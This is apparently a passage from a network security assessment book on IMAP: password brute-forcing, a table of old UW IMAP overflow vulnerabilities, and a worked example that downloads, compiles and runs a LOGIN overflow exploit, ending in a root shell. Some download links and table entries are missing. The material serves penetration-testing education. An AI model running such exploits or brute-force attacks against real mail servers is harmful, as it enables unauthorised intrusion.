10.4 IMAP

Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143. The IMAP protocol is much like POP-3; a user authenticates with a plaintext network service and can then collect and manage their email.

Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP), distributed from the official UW IMAP site at http://www.washington.edu/imap/. Mark Crispin (http://staff.washington.edu/mrc/) invented and maintains IMAP, which currently uses IMAP4rev1 as the standard server protocol (RFC 3501).

10.4.1 IMAP Brute Force

As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus and Hydra do an excellent job brute-forcing valid user-account passwords from both Unix-based and Win32 GUI environments. As mentioned earlier, they can be downloaded from:


Like POP-3, IMAP services are notoriously susceptible to brute-force password-grinding attack because they don't pay attention to account lockout policies and often don't log unsuccessful authentication attempts.

10.4.2 IMAP Process Manipulation Attacks

Since 1997, a handful of remotely exploitable security vulnerabilities within IMAP2bis and IMAP4rev1 services have been publicized, which are summarized in Table 10-5.

Table 10-5. Remotely exploitable IMAP vulnerabilities

CVE name





Washington University IMAP 4 (IMAP4rev1 10.234) and prior AUTHENTICATE command overflow



Washington University IMAP 4.1beta and prior LOGIN command overflow



SuSE Linux IMAP server allows remote attackers to bypass IMAP authentication and gain privileges



Washington University IMAP 4.7 (IMAP4rev1 12.264) post-authentication LIST command overflow



Washington University IMAP 2000c and prior post-authentication BODY command overflow

The serious unauthenticated vulnerabilities in IMAP services are CVE-1999-0005 and CVE-1999-0042. Exploit scripts for the AUTHENTICATE command overflow are available for multiple platforms (including BSDi, Solaris, and Linux) at:


The second unauthenticated vulnerability is the IMAP LOGIN command overflow, for which a good exploit script is available at http://packetstormsecurity.org/Exploit_Code_Archive/imaps.tar.gz.

After finding the correct offset to use with the exploit script, it is very straightforward to compromise a vulnerable Linux host, as shown in Example 10-11.

Example 10-11. The IMAP2bis LOGIN command overflow in action
# wget http://examples.oreilly.com/networksa/tools/imaps.tar.gz

# tar xfz imaps.tar.gz

# cd imaps

# make

cc -O2 -o imaps imaps.c

imaps.c: In function `imap':

imaps.c:35: warning: function returns address of local variable

# ls

hey.sh  imaps*  imaps.c  include/  makefile  other/  readme

# ./imaps 100

Connecting to on port 143.

* OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02


uid=0(root) gid=0(root) groups=0(root)